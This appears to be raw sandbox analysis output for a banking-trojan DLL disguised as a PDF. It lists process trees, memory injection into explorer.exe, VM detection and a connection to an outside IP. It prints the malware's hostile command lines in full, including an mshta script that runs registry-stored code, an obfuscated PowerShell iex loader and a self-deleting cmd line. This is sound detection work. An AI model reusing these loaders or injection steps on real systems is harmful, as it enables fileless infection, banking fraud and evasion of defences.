                      Source: Yara matchFile source: 00000004.00000003.424163423.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424658030.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424644302.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424536633.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.476686328.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424457867.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3340, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5008, type: MEMORYSTR
                      Source: Yara matchFile source: 4.2.rundll32.exe.ef0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e76b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.601015727.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.543939686.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.599055996.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.542346452.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475223060.0000000004DCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.544562349.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475254135.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.361072798.0000000000BAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

                      Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      Source: initial sampleStatic PE information: Filename: 626a97fea05c8.pdf.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EF2A9 CreateProcessAsUserA,
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 626a97fea05c8.pdf.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 626a97fea05c8.pdf.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF6D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF84C1 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F00DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FA806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F61AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E710A GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F7950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F5312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F2331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E74AE NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EC431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F6DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FBE80 NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F0782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E10C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F3829 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FEAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F5220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E64C4 memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E36BB NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EB7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008ED77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: 626a97fea05c8.pdf.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs 626a97fea05c8.pdf.dll
                      Source: 626a97fea05c8.pdf.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220428
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@24/19@0/1
                      Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECA.tmp" "c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B2B.tmp" "c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbj0ibhp.0cz.ps1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF68BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{A446E4F3-B3E1-76BB-5D18-970AE1CCBBDE}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1300:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{50416995-6F24-0207-7984-1356BDF8F7EA}
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{F059674E-8F24-A2C8-9924-33F6DD98178A}
                      Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: 626a97fea05c8.pdf.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000004.00000003.534897078.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.540095400.0000000005D70000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 626a97fea05c8.pdf.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000004.00000003.534897078.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.540095400.0000000005D70000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF7EA0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF828B push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_009038A0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E3495 push ecx; mov dword ptr [esp], 00000002h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00903D9F push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EEC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Source: vx43imot.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x601a
                      Source: pyir2nwc.dll.20.drStatic PE information: real checksum: 0x0 should be: 0x4f4e
                      Source: 626a97fea05c8.pdf.dllStatic PE information: real checksum: 0x79835 should be: 0xa2cb3
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3340, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5008, type: MEMORYSTR
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5785
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2355
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EFD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: mshta.exe, 00000011.00000003.496398794.000001B1A0BA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\b
                      Source: explorer.exe, 0000001B.00000000.574335319.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.574335319.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
                      Source: explorer.exe, 0000001B.00000000.587271714.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000020.00000000.813259722.000002BFD4858000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.587271714.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
                      Source: rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.600473682.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.484939842.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001B.00000000.587271714.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 0000001B.00000000.563226300.00000000042EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
                      Source: explorer.exe, 0000001B.00000000.608751295.00000000042A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E99BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FBAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E65C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EEC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E8FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 94.140.115.8 80
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: AA0000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2890000 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 424A1580
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 424A1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 424A1580
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF772CE12E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: AA0000
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF772CE12E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 40A000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFF424A1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2700000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFF424A1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 400000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFF424A1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2890000
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFF424A1580 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3688 base: 40A000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3688 base: 7FFF424A1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3688 base: 2700000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3688 base: 7FFF424A1580 value: 40
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3688 base: 400000 value: 00
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3688 base: 7FFF424A1580 value: EB
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3688 base: 2890000 value: 80
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 5008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3688
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3688
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECA.tmp" "c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP"
